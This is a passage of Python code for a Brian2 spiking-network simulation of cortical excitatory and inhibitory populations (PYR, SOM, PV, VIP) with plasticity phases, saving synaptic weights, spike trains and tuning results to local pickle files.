PV_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime + p.reward_simtime,
upto=total_simtime - p.after_simtime)
try:
currentratio_initial, currentratiomean_initial, ampE_initial, ampI_initial, amp2Ei, amp2Ii, amp3Ei, amp3Ii = get_currentratio_foreachstim(
currents,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_warmup_simtime - p.nonplasticwarmup_simtime,
upto=total_warmup_simtime)
currentratio_final, currentratiomean_final, ampE_final, ampI_final, amp2Ef, amp2If, amp3Ef, amp3If = get_currentratio_foreachstim(
currents,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=total_simtime - p.after_simtime,
upto=total_simtime)
except:
currentratio_initial = []
currentratiomean_initial = []
ampE_initial = []
ampI_initial = []
amp2Ei = []
amp2Ii = []
amp3Ei = []
amp3Ii = []
currentratio_final = []
currentratiomean_final = []
ampE_final = []
ampI_final = []
amp2Ef = []
amp2If = []
amp3Ef = []
amp3If = []
results = {
'impact': impact,
'impact_aftereward': impactmax_afterreward,
'impactmax': impact,
'impactmax_aftereward': impactmax_afterreward,
'SOM0PV': SOM0PV.w,
'SOMotherPV': SOMotherPV.w,
'weights_rec': con_REC.w[:],
'weights_rec_afterwarmup': conREC_afterwarmup,
'weights_rec_afterreward': conREC_afterreward,
'weights_rec_start': conREC_start,
'weights_rec_i': con_REC.i[:],
'weights_rec_j': con_REC.j[:],
'weights_sst_pv': con_SOM_PV.w[:],
'weights_sst_pv_afterwarmup': sstpv_w_afterwarmup,
'weights_sst_pv_afterreward': sstpv_w_afterreward,
'stimtuning_initial': stimtuning_initial,
'stimtuning_final': stimtuning_final,
'stimPVtuning_initial': stimPVtuning_initial,
'stimPVtuning_final': stimPVtuning_final,
't': PYR1.t[:],
'tuning_initial': tuning_initial,
'tuning_final': tuning_final,
'tuning_afterwarmup': tuning_afterwarmup,
'tuning_rewardend': tuning_duringreward,
'tuning_after_rewardend': tuning_afterreward,
'PVtuning_initial': PVtuning_initial,
'PVtuning_final': PVtuning_final,
'PVtuning_afterwarmup': PVtuning_afterwarmup,
'PVtuning_rewardend': PVtuning_duringreward,
'PVtuning_after_rewardend': PVtuning_afterreward,
'VIPtuning_initial': VIPtuning_initial,
'VIPtuning_final': VIPtuning_final,
'VIPtuning_afterwarmup': VIPtuning_afterwarmup,
'VIPtuning_rewardend': VIPtuning_duringreward,
'VIPtuning_after_rewardend': VIPtuning_afterreward,
'SOMtuning_initial': SOMtuning_initial,
'SOMtuning_final': SOMtuning_final,
'SOMtuning_rewardend': SOMtuning_duringreward,
'SOMtuning_after_rewardend': SOMtuning_afterreward,
'SOMPV_t': monSOMPV.t[:],
'SOMPV_w': monSOMPV.w[:],
'PYRPV_w': monPYRPV.w[:],
#'PYRSOM_w' : monPYRSOM.w[:],
'PYRVIP_w': monPYRVIP.w[:],
'PVPYR_w': monPVPYR.w[:],
'PVPV_w': monPVPV.w[:],
'PVSOM_w': monPVSOM.w[:],
'PVVIP_w': monPVVIP.w[:],
'VIPSOM_w': monVIPSOM.w[:],
'VIPPYR_w': monVIPPYR.w[:],
'VIPPV_w': monVIPPV.w[:],
'VIPVIP_w': monVIPVIP.w[:],
'SOMVIP_w': monSOMVIP.w[:],
'SOMPYR_w': monSOMPYR.w[:],
'SOMSOM_w': monSOMSOM.w[:],
'PYRSOM1_w': monPYRSOM1.w[:],
'PYRSOM2_w': monPYRSOM2.w[:],
'PYRSOM3_w': monPYRSOM3.w[:],
'PYRSOM4_w': monPYRSOM4.w[:],
'currentratio_initial': currentratio_initial,
'currentratio_final': currentratio_final,
#'ampE_initial': ampE_initial,
#'ampE_final': ampE_final,
#'ampI_initial': ampI_initial,
#'ampI_final': ampI_final,
#'amp2E_initial': amp2Ei,
#'amp2E_final': amp2Ef,
#'amp2I_initial': amp2Ii,
#'amp2I_final': amp2If,
#'inh_currents1': neuron1.IsynI[0],
#'exc_currents1': neuron1.IsynE[0],
#'inh_currents2': neuron2.IsynI[0],
#'exc_currents2': neuron2.IsynE[0],
#'inh_currents3': neuron3.IsynI[0],
#'exc_currents3': neuron3.IsynE[0],
#'inh_currents4': neuron4.IsynI[0],
#'exc_currents4': neuron4.IsynE[0],
#'inh_currentsPV': PVneuron1.IsynI[0],
#'exc_currentsPV': PVneuron1.IsynE[0],
#'inh_currentsSOM1': SOMneuron1.IsynI[0],
#'exc_currentsSOM1': SOMneuron1.IsynE[0],
#'inh_currentsSOM2': SOMneuron2.IsynI[0],
#'exc_currentsSOM2': SOMneuron2.IsynE[0],
'PYR0toothers': mona.w,
'otherstoPYR0': monb.w,
'PYR1toothers': monc.w,
'PYR2toothers': mond.w,
'PYR3toothers': mone.w,
'PYRi': PYRi[:],
'PYRt': PYRt[:],
'SSTi': SSTi[:],
'SSTt': SSTt[:],
'PVi': PVi[:],
'PVt': PVt[:],
'VIPi': VIPi[:],
'VIPt': VIPt[:],
'PYRData0_reward': PYRData_reward['0'], # during stimulus 0
'PYRData1_reward': PYRData_reward['1'], # during stimulus 1
'PVData_reward': PVData_reward['0'],
'PVData1_reward': PVData_reward['1'],
'SSTData_reward': SSTData_reward['0'],
'SSTData1_reward': SSTData_reward['1'],
'PYRData0': PYRData_afterreward['0'],
'PYRData1': PYRData_afterreward['1'],
'PVData0': PVData_afterreward['0'],
'PVData1': PVData_afterreward['1'],
'SSTData0': SSTData_afterreward['0'],
'SSTData1': SSTData_afterreward['1'],
'PYRDataAll0': PYRData['0'], # during stimulus 0
'PYRDataAll1': PYRData['1'], # during stimulus 1
'PYRDataAll2': PYRData['2'], # during stimulus 2
'PYRDataAll3': PYRData['3'], # during stimulus 3
'SSTDataAll0': SSTData['0'],
'SSTDataAll1': SSTData['1'],
'SSTDataAll2': SSTData['2'],
'SSTDataAll3': SSTData['3'],
'PVDataAll0': PVData['0'],
'PVDataAll1': PVData['1'],
'PVDataAll2': PVData['2'],
'PVDataAll3': PVData['3'],
'Pyr1rate': PYR1.smooth_rate(window='flat', width=0.5 * ms),
'Pyr2rate': PYR2.smooth_rate(window='flat', width=0.5 * ms),
'Pyr3rate': PYR3.smooth_rate(window='flat', width=0.5 * ms),
'Pyr4rate': PYR4.smooth_rate(window='flat', width=0.5 * ms),
'SOM1rate': SOM1.smooth_rate(window='flat', width=0.5 * ms),
'SOM2rate': SOM2.smooth_rate(window='flat', width=0.5 * ms),
'SOM3rate': SOM3.smooth_rate(window='flat', width=0.5 * ms),
'SOM4rate': SOM4.smooth_rate(window='flat', width=0.5 * ms),
'PVrate': PVmon.smooth_rate(window='flat', width=0.5 * ms),
}
results_file = f'./results/results_tuned{TUNED_ORI}_2.pkl'
print("Saving results to:", results_file)
with open(results_file, 'wb') as f:
pickle.dump(results, f) | 38.664675 | 146 | 0.535618 |
import numpy as np
import pickle
from brian2 import *
from brian2tools import *
from analyse_experiment import *
from plot_Spikingmodel import *
from utils import *
RESULTS_DIR = './results'
TUNED_ORI = 1
def run_network(params):
p = Struct(**params)
total_simtime = p.nonplasticwarmup_simtime + p.warmup_simtime + p.reward_simtime + p.noreward_simtime + p.noSSTPV_simtime + p.after_simtime
total_warmup_simtime = p.nonplasticwarmup_simtime + p.warmup_simtime
stim_time = p.stim_time
input_time = p.input_time
seed(p.seed)
N4 = p.N4
L4_rate = p.L4_rate
gl = p.gl
el = p.el
er = p.er
vt = p.vt
memc = p.memc
tau_gaba = p.tau_gaba
tau_ampa = p.tau_ampa
tau = p.tau_noise
sigma = p.sigma
w_PYR_PV = p.w_PYR_PV
w_PYR_VIP = p.w_PYR_VIP
w_PYR_SOM = p.w_PYR_SOM
w_FFPYR = p.w_FFPYR
w_FFPV = p.w_FFPV
w_FFSOM = p.w_FFSOM
w_TDVIP = p.w_TDVIP
w_L4PYR = p.w_L4PYR
c_gap = p.c_gap
tau_spikelet = p.tau_spikelet
tau_stdp = p.tau_stdp
tau_istdp = p.tau_istdp
relbound = p.relbound
gmax_SSTPV = p.gmax_SSTPV
dApre = p.dApre * nS
dApost = -dApre * tau_stdp / tau_stdp * 1.05
dApre_i = p.dApre_i * nS
dApost_i = -dApre_i * tau_istdp / tau_istdp * 1.05
eqs_FF = '''
rate = L4_rate: Hz
'''
FF = NeuronGroup(1,
eqs_FF,
threshold='rand() < rate*dt',
method='euler',
name='FF')
eqs_layer4 = '''
rate = clip(cos(orientation*2 - selectivity*2), 0, inf)*L4_rate : Hz
stim_rate = rate*int(t<stim_end_time): Hz
gap_rate = (L4_rate*2/5)*int(t>=stim_end_time) : Hz
selectivity : 1 # preferred orientation
orientation : 1 (shared) # orientation of the current stimulus
stim_start_time : second (shared) # start time of the current stimulus
stim_end_time : second (shared) # end time of the current stimulus
'''
layer4 = NeuronGroup(N4,
eqs_layer4,
threshold='rand() < stim_rate *dt',
method='euler',
name='layer4')
gapfiller = NeuronGroup(N4,
'''gap_rate : Hz (linked)''',
threshold='rand() < gap_rate *dt',
method='euler',
name='gapfiller')
gapfiller.gap_rate = linked_var(layer4, 'gap_rate')
layer4.selectivity = '(i%N4)/(1.0*N4)*pi'
runner_code = '''
orientation = ((int(floor(rand()*N4)))%4)/(1.0*4)*pi
stim_start_time = t
stim_end_time = t + stim_time
'''
layer4.run_regularly(runner_code, dt=p.input_time, when='start')
eqs_neurons = '''
dv/dt=(-gl*(v-el)+Isyn+Igap+Ispikelet)/memc + sigma * (2 / tau)**.5 *xi: volt (unless refractory)
Isyn = IsynE + IsynI : amp
IsynE = -g_ampa*v : amp
IsynI = -g_gaba*(v-er) : amp
Igap: amp
dIspikelet/dt = -Ispikelet/tau_spikelet : amp
dg_ampa/dt = -g_ampa/tau_ampa : siemens
dg_gaba/dt = -g_gaba/tau_gaba : siemens
'''
STDP_E = '''
w : siemens
gmax : siemens
dApre/dt = -Apre / tau_stdp : siemens (event-driven)
dApost/dt = -Apost / tau_stdp : siemens (event-driven)
plastic : boolean (shared)
'''
on_pre_STDP_E = '''g_ampa += w
Apre += dApre
w = clip(w + plastic*Apost, 0*nS, gmax)'''
on_post_STDP_E = '''Apost += dApost
w = clip(w + plastic*Apre, 0*nS, gmax)'''
on_pre_antiHebb_IE = '''g_ampa += w
Apre += dApre
w = clip(w - plastic*Apost, 0*nS, gmax)'''
on_post_antiHebb_IE = '''Apost += dApost
w = clip(w - plastic*Apre, 0*nS, gmax)'''
exc_neurons = NeuronGroup(p.NPYR,
model=eqs_neurons,
threshold='v > vt',
reset='v=el',
refractory=2 * ms,
method='euler')
inh_neurons = NeuronGroup(p.NSOM + p.NVIP + p.NPV,
model=eqs_neurons,
threshold='v > vt',
reset='v=el',
refractory=2 * ms,
method='euler')
PYR = exc_neurons[:p.NPYR]
SOM = inh_neurons[:p.NSOM]
VIP = inh_neurons[p.NSOM:int(p.NSOM + p.NVIP)]
PV = inh_neurons[int(p.NSOM + p.NVIP):]
feedforward1 = Synapses(layer4[0:1],
PYR[0:100],
'''w = w_L4PYR: siemens''',
on_pre='g_ampa += w',
name='feedforward1')
feedforward1.connect(p=1)
feedforward2 = Synapses(layer4[1:2],
PYR[100:200],
on_pre='g_ampa += w_L4PYR',
name='feedforward2')
feedforward2.connect(p=1)
feedforward3 = Synapses(layer4[2:3],
PYR[200:300],
on_pre='g_ampa += w_L4PYR',
name='feedforward3')
feedforward3.connect(p=1)
feedforward4 = Synapses(layer4[3:4],
PYR[300:400],
on_pre='g_ampa += w_L4PYR',
name='feedforward4')
feedforward4.connect(p=1)
feedforwardgap1 = Synapses(gapfiller[0:1],
PYR[0:100],
on_pre='g_ampa += w_L4PYR',
name='feedforwardgap1')
feedforwardgap1.connect(p=1)
feedforwardgap2 = Synapses(gapfiller[1:2],
PYR[100:200],
on_pre='g_ampa += w_L4PYR',
name='feedforwardgap2')
feedforwardgap2.connect(p=1)
feedforwardgap3 = Synapses(gapfiller[2:3],
PYR[200:300],
on_pre='g_ampa += w_L4PYR',
name='feedforwardgap3')
feedforwardgap3.connect(p=1)
feedforwardgap4 = Synapses(gapfiller[3:4],
PYR[300:400],
on_pre='g_ampa += w_L4PYR',
name='feedforwardgap4')
feedforwardgap4.connect(p=1)
feedforward_unspec = Synapses(FF,
PYR,
on_pre='g_ampa += w_FFPYR',
name='feedforward_unspec')
feedforward_unspec.connect(p=1)
feedforward_PV = Synapses(FF,
PV,
on_pre='g_ampa += w_FFPV',
name='feedforward_PV')
feedforward_PV.connect(p=1)
feedforward_i1 = Synapses(layer4[0:1],
SOM[0:30],
on_pre='g_ampa += w_FFSOM',
name='feedforward_i1')
feedforward_i1.connect(p=1)
feedforward_i2 = Synapses(layer4[1:2],
SOM[30:60],
on_pre='g_ampa += w_FFSOM',
name='feedforward_i2')
feedforward_i2.connect(p=1)
feedforward_i3 = Synapses(layer4[2:3],
SOM[60:90],
on_pre='g_ampa += w_FFSOM',
name='feedforward_i3')
feedforward_i3.connect(p=1)
feedforward_i4 = Synapses(layer4[3:4],
SOM[90:120],
on_pre='g_ampa += w_FFSOM',
name='feedforward_i4')
feedforward_i4.connect(p=1)
feedforward_gap1 = Synapses(gapfiller[0:1],
SOM[0:30],
on_pre='g_ampa += w_FFSOM*1.1',
name='feedforward_gapi1')
feedforward_gap1.connect(p=1)
feedforward_gap2 = Synapses(gapfiller[1:2],
SOM[30:60],
on_pre='g_ampa += w_FFSOM*1.1',
name='feedforward_gapi2')
feedforward_gap2.connect(p=1)
feedforward_gap3 = Synapses(gapfiller[2:3],
SOM[60:90],
on_pre='g_ampa += w_FFSOM*1.1',
name='feedforward_gapi3')
feedforward_gap3.connect(p=1)
feedforward_gap4 = Synapses(gapfiller[3:4],
SOM[90:120],
on_pre='g_ampa += w_FFSOM*1.1',
name='feedforward_gapi4')
feedforward_gap4.connect(p=1)
on_pre_PCSOM = on_pre_antiHebb_IE
on_post_PCSOM = on_post_antiHebb_IE
PYR_SOM1 = Synapses(PYR[0:100],
SOM[0:30],
STDP_E,
on_pre=on_pre_PCSOM,
on_post=on_post_PCSOM,
name='PYR_SOM1')
PYR_SOM1.connect(p=p.p_PYR_SOM)
PYR_SOM1.w = w_PYR_SOM
PYR_SOM1.gmax = w_PYR_SOM + relbound * nS
PYR_SOM2 = Synapses(PYR[100:200],
SOM[30:60],
STDP_E,
on_pre=on_pre_PCSOM,
on_post=on_post_PCSOM,
name='PYR_SOM2')
PYR_SOM2.connect(p=p.p_PYR_SOM)
PYR_SOM2.w = w_PYR_SOM
PYR_SOM2.gmax = w_PYR_SOM + relbound * nS
PYR_SOM3 = Synapses(PYR[200:300],
SOM[60:90],
STDP_E,
on_pre=on_pre_PCSOM,
on_post=on_post_PCSOM,
name='PYR_SOM3')
PYR_SOM3.connect(p=p.p_PYR_SOM)
PYR_SOM3.w = w_PYR_SOM
PYR_SOM3.gmax = w_PYR_SOM + relbound * nS
PYR_SOM4 = Synapses(PYR[300:400],
SOM[90:120],
STDP_E,
on_pre=on_pre_PCSOM,
on_post=on_post_PCSOM,
name='PYR_SOM4')
PYR_SOM4.connect(p=p.p_PYR_SOM)
PYR_SOM4.w = w_PYR_SOM
PYR_SOM4.gmax = w_PYR_SOM + relbound * nS
Synaptic_model_I = '''w : siemens
gmax_i : siemens
dApre_i/dt = -Apre_i / tau_istdp : siemens (event-driven)
dApost_i/dt = -Apost_i / tau_istdp : siemens (event-driven)
plastic : boolean (shared)'''
on_pre_STDP_I = '''g_gaba += w
Apre_i += dApre_i
w = clip(w + plastic*Apost_i, 0*nS, gmax_i)'''
on_post_STDP_I = '''Apost_i += dApost_i
w = clip(w + plastic*Apre_i, 0*nS, gmax_i)'''
on_pre_antiHebb_I = '''g_gaba += w
Apre_i += dApre_i
w = clip(w - plastic*Apost_i, 0*nS, gmax_i)'''
on_post_antiHebb_I = '''Apost_i += dApost_i
w = clip(w - plastic*Apre_i, 0*nS, gmax_i)'''
con_REC = Synapses(PYR,
PYR,
STDP_E,
on_pre=on_pre_STDP_E,
on_post=on_post_STDP_E,
name='recurrent')
con_REC.connect(p=p.p_PYR_PYR)
con_REC.gmax = p.gmax
con_REC.w = p.recurrent_weights
con_SOM_PV = Synapses(SOM,
PV,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='som2pv')
con_SOM_PV.connect(p=p.p_SOM_PV)
con_SOM_PV.w = p.SOM2PV_weights
con_SOM_PV.gmax_i = p.gmax_SSTPV
con_PYR_PV = Synapses(PYR,
PV,
STDP_E,
on_pre=on_pre_STDP_E,
on_post=on_post_STDP_E,
name='PYR0_PV0')
con_PYR_PV.connect(p=p.p_PYR_PV)
con_PYR_PV.w = w_PYR_PV
con_PYR_PV.gmax = p.w_PYR_PV + relbound * nS
con_PYR_VIP = Synapses(PYR,
VIP,
STDP_E,
on_pre=on_pre_STDP_E,
on_post=on_post_STDP_E,
name='PYR0_VIP0')
con_PYR_VIP.connect(p=p.p_PYR_VIP)
con_PYR_VIP.w = w_PYR_VIP
con_PYR_VIP.gmax = p.w_PYR_VIP + relbound * nS
con_SOM_PYR = Synapses(SOM,
PYR,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='SOMPYR')
con_SOM_PYR.connect(p=p.p_SOM_PYR)
con_SOM_PYR.w = p.w_SOM_PYR
con_SOM_PYR.gmax_i = p.w_SOM_PYR + relbound * nS
con_SOM_VIP = Synapses(SOM,
VIP,
Synaptic_model_I,
on_pre='''g_gaba += w
Apre_i += dApre_i
w = clip(w + plastic*.1*Apost_i, 0*nS, gmax_i)''',
on_post='''Apost_i += dApost_i
w = clip(w + plastic*.1*Apre_i, 0*nS, gmax_i)''',
name='SOMVIP')
con_SOM_VIP.connect(p=p.p_SOM_VIP)
con_SOM_VIP.w = p.w_SOM_VIP
con_SOM_VIP.gmax_i = p.w_SOM_VIP + relbound * nS
con_SOM_SOM = Synapses(SOM,
SOM,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='SOMSOM')
con_SOM_SOM.connect(p=p.p_SOM_SOM)
con_SOM_SOM.w = p.w_SOM_SOM
con_SOM_SOM.gmax_i = p.w_SOM_SOM + relbound * nS
con_PV_PYR = Synapses(PV,
PYR,
Synaptic_model_I,
on_pre=on_pre_antiHebb_I,
on_post=on_post_antiHebb_I,
name='PVPYR')
con_PV_PYR.connect(p=p.p_PV_PYR)
con_PV_PYR.w = p.w_PV_PYR
con_PV_PYR.gmax_i = p.w_PV_PYR + relbound * nS
con_PV_SOM = Synapses(PV,
SOM,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='PVSOM')
con_PV_SOM.connect(p=p.p_PV_SOM)
con_PV_SOM.w = p.w_PV_SOM
con_PV_SOM.gmax_i = p.w_PV_SOM + relbound * nS
con_PV_VIP = Synapses(PV,
VIP,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='PVVIP')
con_PV_VIP.connect(p=p.p_PV_VIP)
con_PV_VIP.w = p.w_PV_VIP
con_PV_VIP.gmax_i = p.w_PV_VIP + relbound * nS
con_PV_PV = Synapses(PV,
PV,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='PVPV')
con_PV_PV.connect(p=p.p_PV_PV)
con_PV_PV.w = p.w_PV_PV
con_PV_PV.gmax_i = p.w_PV_PV + relbound * nS
on_pre_VIPSOM = on_pre_antiHebb_I
on_post_VIPSOM = on_post_antiHebb_I
con_VIP_SOM = Synapses(VIP,
SOM,
Synaptic_model_I,
on_pre=on_pre_VIPSOM,
on_post=on_post_VIPSOM,
name='VIPSOM')
con_VIP_SOM.connect(p=p.p_VIP_SOM)
con_VIP_SOM.w = p.w_VIP_SOM
con_VIP_SOM.gmax_i = p.w_VIP_SOM + relbound * nS
con_VIP_PYR = Synapses(VIP,
PYR,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='VIPPYR')
con_VIP_PYR.connect(p=p.p_VIP_PYR)
con_VIP_PYR.w = p.w_VIP_PYR
con_VIP_PYR.gmax_i = p.w_VIP_PYR + relbound * nS
con_VIP_PV = Synapses(VIP,
PV,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='VIPPV')
con_VIP_PV.connect(p=p.p_VIP_PV)
con_VIP_PV.w = p.w_VIP_PV
con_VIP_PV.gmax_i = p.w_VIP_PV + relbound * nS
con_VIP_VIP = Synapses(VIP,
VIP,
Synaptic_model_I,
on_pre=on_pre_STDP_I,
on_post=on_post_STDP_I,
name='VIPVIP')
con_VIP_VIP.connect(p=p.p_VIP_VIP)
con_VIP_VIP.w = p.w_VIP_VIP
con_VIP_VIP.gmax_i = p.w_VIP_VIP + relbound * nS
PVPV_gap = Synapses(
PV,
PV,
'''w : siemens
Igap_post = w * (v_pre - v_post) : amp (summed)''',
on_pre='Ispikelet+=c_gap',
)
PVPV_gap.connect()
PVPV_gap.w = p.w_gap
TD = NeuronGroup(p.NTD,
model=eqs_neurons,
threshold='v > vt',
reset='v=el',
refractory=2 * ms,
method='euler')
con_ff_td = Synapses(layer4[TUNED_ORI:TUNED_ORI + 1],
TD,
on_pre='g_ampa += 0.3*nS')
con_ff_td.connect(p=p.p_L4_TD)
con_topdown = Synapses(TD, VIP, on_pre='g_ampa += w_TDVIP')
con_topdown.connect(p=p.p_TD_VIP)
store('nonplasticwarmup', filename='checkpoints/test.pkl')
restore('afternoSSTPV', filename='checkpoints/test2.pkl')
Stimmonitor = SpikeMonitor(layer4, variables=['orientation'])
monPYRPV = StateMonitor(con_PYR_PV, 'w', record=True, dt=1000 * ms)
monVIPSOM = StateMonitor(con_VIP_SOM, 'w', record=True, dt=1000 * ms)
monVIPPV = StateMonitor(con_VIP_PV, 'w', record=True, dt=1000 * ms)
monVIPPYR = StateMonitor(con_VIP_PYR, 'w', record=True, dt=1000 * ms)
monPVPYR = StateMonitor(con_PV_PYR, 'w', record=True, dt=1000 * ms)
monPVSOM = StateMonitor(con_PV_SOM, 'w', record=True, dt=1000 * ms)
monPVPV = StateMonitor(con_PV_PV, 'w', record=True, dt=1000 * ms)
monPVVIP = StateMonitor(con_PV_VIP, 'w', record=True, dt=1000 * ms)
monSOMVIP = StateMonitor(con_SOM_VIP, 'w', record=True, dt=1000 * ms)
monSOMPYR = StateMonitor(con_SOM_PYR, 'w', record=True, dt=1000 * ms)
monSOMSOM = StateMonitor(con_SOM_SOM, 'w', record=True, dt=1000 * ms)
monPYRSOM1 = StateMonitor(PYR_SOM1, 'w', record=True, dt=1000 * ms)
monPYRSOM2 = StateMonitor(PYR_SOM2, 'w', record=True, dt=1000 * ms)
monPYRSOM3 = StateMonitor(PYR_SOM3, 'w', record=True, dt=1000 * ms)
monPYRSOM4 = StateMonitor(PYR_SOM4, 'w', record=True, dt=1000 * ms)
monPYRVIP = StateMonitor(con_PYR_VIP, 'w', record=True, dt=1000 * ms)
monVIPVIP = StateMonitor(con_VIP_VIP, 'w', record=True, dt=1000 * ms)
mona = StateMonitor(con_REC,
'w',
record=con_REC[0:100, 100:400],
dt=100 * ms)
monb = StateMonitor(con_REC,
'w',
record=con_REC[100:400, 0:100],
dt=100 * ms)
monc = StateMonitor(con_REC,
'w',
record=con_REC[100:200, 200:400],
dt=100 * ms)
mond = StateMonitor(
con_REC,
'w',
record=con_REC[
'(i>=200) and (i<300) and (((j>=100) and (j<200)) or (j>300))'],
dt=100 * ms)
mone = StateMonitor(con_REC,
'w',
record=con_REC[300:400, 100:300],
dt=100 * ms)
PYR1 = PopulationRateMonitor(PYR[0:100])
PYR2 = PopulationRateMonitor(PYR[100:200])
PYR3 = PopulationRateMonitor(PYR[200:300])
PYR4 = PopulationRateMonitor(PYR[300:400])
SOM1 = PopulationRateMonitor(SOM[0:30])
SOM2 = PopulationRateMonitor(SOM[30:60])
SOM3 = PopulationRateMonitor(SOM[60:90])
SOM4 = PopulationRateMonitor(SOM[90:120])
PVmon = PopulationRateMonitor(PV)
VIPmon = PopulationRateMonitor(VIP)
monSOMPV = StateMonitor(con_SOM_PV, 'w', record=True, dt=1000 * ms)
SOM0PV = StateMonitor(con_SOM_PV, 'w', record=con_SOM_PV[:30:10, ::40])
SOMotherPV = StateMonitor(con_SOM_PV,
'w',
record=con_SOM_PV[30::10, 1::40])
sm_PYR = SpikeMonitor(PYR)
sm_VIP = SpikeMonitor(VIP)
sm_SOM = SpikeMonitor(SOM)
sm_PV = SpikeMonitor(PV)
sm_TD = SpikeMonitor(TD)
sm_layer4 = SpikeMonitor(layer4)
sm_FF = SpikeMonitor(FF)
sm_gap = SpikeMonitor(gapfiller)
defaultclock.dt = p.timestep
con_ff_td.active = False
TD.active = False
con_REC.plastic = False
con_SOM_PV.plastic = False
con_PYR_PV.plastic = False
PYR_SOM1.plastic = False
PYR_SOM2.plastic = False
PYR_SOM3.plastic = False
PYR_SOM4.plastic = False
con_PYR_VIP.plastic = False
con_VIP_SOM.plastic = False
con_VIP_PV.plastic = False
con_VIP_VIP.plastic = False
con_VIP_PYR.plastic = False
con_SOM_PYR.plastic = False
con_SOM_VIP.plastic = False
con_SOM_SOM.plastic = False
con_PV_SOM.plastic = False
con_PV_PYR.plastic = False
con_PV_VIP.plastic = False
con_PV_PV.plastic = False
conREC_start = np.copy(con_REC.w[:])
run(p.nonplasticwarmup_simtime, report='text')
store('nonplasticwarmup')
print('non-plastic warmup done')
restore('nonplasticwarmup')
con_ff_td.active = False
TD.active = False
con_REC.plastic = True
con_SOM_PV.plastic = True
if p.restplastic == True:
con_VIP_SOM.plastic = True
con_PYR_PV.plastic = True
con_PV_PYR.plastic = True
con_PYR_VIP.plastic = True
PYR_SOM1.plastic = True
PYR_SOM2.plastic = True
PYR_SOM3.plastic = True
PYR_SOM4.plastic = True
con_VIP_PV.plastic = True
con_VIP_VIP.plastic = True
con_VIP_PYR.plastic = True
con_SOM_PYR.plastic = True
con_SOM_VIP.plastic = True
con_SOM_SOM.plastic = True
con_PV_SOM.plastic = True
con_PV_VIP.plastic = True
con_PV_PV.plastic = True
else:
con_PYR_PV.plastic = False
PYR_SOM1.plastic = False
PYR_SOM2.plastic = False
PYR_SOM3.plastic = False
PYR_SOM4.plastic = False
con_PYR_VIP.plastic = False
con_VIP_SOM.plastic = False
con_VIP_PV.plastic = False
con_VIP_VIP.plastic = False
con_VIP_PYR.plastic = False
con_SOM_PYR.plastic = False
con_SOM_VIP.plastic = False
con_SOM_SOM.plastic = False
con_PV_SOM.plastic = False
con_PV_PYR.plastic = False
con_PV_VIP.plastic = False
con_PV_PV.plastic = False
print('starting warmup')
run(p.warmup_simtime, report='text')
conREC_afterwarmup = np.copy(con_REC.w[:])
sstpv_w_afterwarmup = np.copy(con_SOM_PV.w[:])
store('afterwarmup')
print('warmup done')
restore('afterwarmup')
con_ff_td.active = True
TD.active = True
con_REC.plastic = True
con_SOM_PV.plastic = True
print('starting reward period')
run(p.reward_simtime, report='text')
impact_afterreward, impactmax_afterreward = calc_impact(con_REC.w)
print('calculated impacts')
conREC_afterreward = np.copy(con_REC.w[:])
print('copied con_Rec')
sstpv_w_afterreward = np.copy(con_SOM_PV.w[:])
print('copied sstpv')
store('afterreward')
print('rewarded phase done')
restore('afterreward')
con_SOM_PV.plastic = True
con_ff_td.active = False
con_topdown.active = False
TD.active = False
print('starting refinement phase')
run(p.noreward_simtime, report='text')
store('afternoreward')
print('45s of refinement phase done')
restore('afternoreward')
con_ff_td.active = False
TD.active = False
con_REC.plastic = True
con_SOM_PV.plastic = True
run(p.noSSTPV_simtime, report='text')
store('afternoSSTPV')
print('refinement phase done')
restore('afternoSSTPV')
con_ff_td.active = False
TD.active = False
con_REC.plastic = False
con_SOM_PV.plastic = False
con_PYR_PV.plastic = False
PYR_SOM1.plastic = False
PYR_SOM2.plastic = False
PYR_SOM3.plastic = False
PYR_SOM4.plastic = False
con_PYR_VIP.plastic = False
con_VIP_SOM.plastic = False
con_VIP_PV.plastic = False
con_VIP_VIP.plastic = False
con_VIP_PYR.plastic = False
con_SOM_PYR.plastic = False
con_SOM_VIP.plastic = False
con_SOM_SOM.plastic = False
con_PV_SOM.plastic = False
con_PV_PYR.plastic = False
con_PV_VIP.plastic = False
con_PV_PV.plastic = False
run(p.after_simtime, report='text')
PYR_spiketrains = sm_PYR.spike_trains()
SOM_spiketrains = sm_SOM.spike_trains()
VIP_spiketrains = sm_VIP.spike_trains()
PV_spiketrains = sm_PV.spike_trains()
stimuli_t = Stimmonitor.t
PYRi, PYRt = sm_PYR.it
SSTi, SSTt = sm_SOM.it
PVi, PVt = sm_PV.it
VIPi, VIPt = sm_VIP.it
gapi, gapt = sm_gap.it
results = {
'PYR_spike_train': PYR_spiketrains,
'SOM_spike_train': SOM_spiketrains,
'VIP_spike_train': VIP_spiketrains
}
results_file = RESULTS_DIR + f'/results_tuned{TUNED_ORI}_1.pkl'
print('Saving results to: ' + results_file)
if not os.path.exists(RESULTS_DIR):
os.mkdir(RESULTS_DIR)
with open(results_file, 'wb') as f:
pickle.dump(results, f)
impact, impactmax = calc_impact(con_REC.w)
no_stimuli = 4
reward_endtime = total_warmup_simtime + p.reward_simtime
first, endofreward, startofnonreward, last = get_particular_stimulus_times(
Stimmonitor.orientation, Stimmonitor.t, no_stimuli, reward_endtime,
reward_endtime)
tuning_rewardend = get_spike_response(PYR_spiketrains,
no_stimuli,
p.input_time,
last=endofreward)
tuning_after_rewardend = get_spike_response(PYR_spiketrains,
no_stimuli,
p.input_time,
first=startofnonreward)
tuning_initial = get_tuning_avgoverperiod(PYR_spiketrains,
Stimmonitor.orientation,
Stimmonitor.t,
no_stimuli,
p.input_time,
startat=p.input_time,
